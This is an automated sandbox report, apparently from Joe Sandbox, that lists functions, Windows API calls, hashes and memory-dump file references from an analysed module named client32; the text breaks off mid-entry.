Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751

Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8

Strings

psapi.dll, xrefs: 110262C1

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80

Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E

Strings

nslsp.dll, xrefs: 11015533

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: nslsp.dll
API String ID: 1029625771-3933918195
Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80

Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110750EF
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1

Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 110608C3
__CxxThrowException@8.LIBCMT ref: 110608D8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: f53edd8a3547965c10928d98d0274f9b7efb0488a05ac9eb6089c88382d9505c
Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
Opcode Fuzzy Hash: f53edd8a3547965c10928d98d0274f9b7efb0488a05ac9eb6089c88382d9505c
Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1

Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1105F806
_memmove.LIBCMT ref: 1105F811

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: 30119d087e067e0d7fd8ccd6e1b50501c0c2e4bd173188fdf4aa3c61b116ce74
Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
Opcode Fuzzy Hash: 30119d087e067e0d7fd8ccd6e1b50501c0c2e4bd173188fdf4aa3c61b116ce74
Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0

Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110886DF
InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90

Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
ExtractIconExA.SHELL32(?,00000000,00050437,00020451,00000001), ref: 11145068

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741

Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

__lock_file.LIBCMT ref: 11164CBE

Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E

__fclose_nolock.LIBCMT ref: 11164CC9

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46

Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7

Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA

GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2

Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010B94

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90

Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A38400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754

Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90

Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007

Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780

Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

